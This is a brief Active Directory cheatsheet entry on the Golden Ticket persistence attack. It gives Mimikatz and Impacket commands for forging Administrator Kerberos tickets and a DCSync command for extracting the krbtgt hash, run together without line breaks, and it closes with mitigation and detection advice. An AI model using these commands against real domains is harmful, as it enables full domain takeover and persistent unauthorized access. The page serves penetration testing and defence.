Golden Ticket
Active Directory cheatsheet — Active Directory enumeration and attack techniques.
Overview
Golden Ticket is a persistence attack where an attacker with access to the krbtgt account's password hash can forge arbitrary Kerberos Ticket Granting Tickets (TGTs). This allows access to any resource in the domain with any identity.
The krbtgt hash is the most valuable target in an AD environment, as it grants unlimited domain access without any time restrictions.
Category: Active Directory — Active Directory enumeration and attack techniques.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting Golden Ticket:
kerberos::golden /domain:domain.local /sid:S-1-5-21-... /krbtgt:<hash> /user:Administrator /id:500 /pttkerberos::golden /domain:domain.local /sid:S-1-5-21-... /krbtgt:<hash> /user:Administrator /id:500 /groups:519 /pttimpacket-ticketer -nthashes <krbtgt-hash> -domain-sid S-1-5-21-... -domain domain.local Administratorlsadump::dcsync /domain:domain.local /user:krbtgtTools & Techniques
Recommended tools for Golden Ticket:
- Mimikatz kerberos::golden: golden ticket creation
- Impacket ticketer: UNIX-based golden ticket generation
- Requires: krbtgt hash, domain SID, domain name
Prevention & Mitigation
Security recommendations to prevent Golden Ticket:
- Reset the krbtgt password regularly (every 12-24 months)
- Reset the krbtgt password twice (due to Kerberos delay) when changing
- Use a strong, random krbtgt password with high entropy
- Monitor for anomalous TGT requests (Event ID 4768)
- Implement privileged access management solutions
- Detect golden ticket usage via Event ID 4624 correlation
References
Additional resources: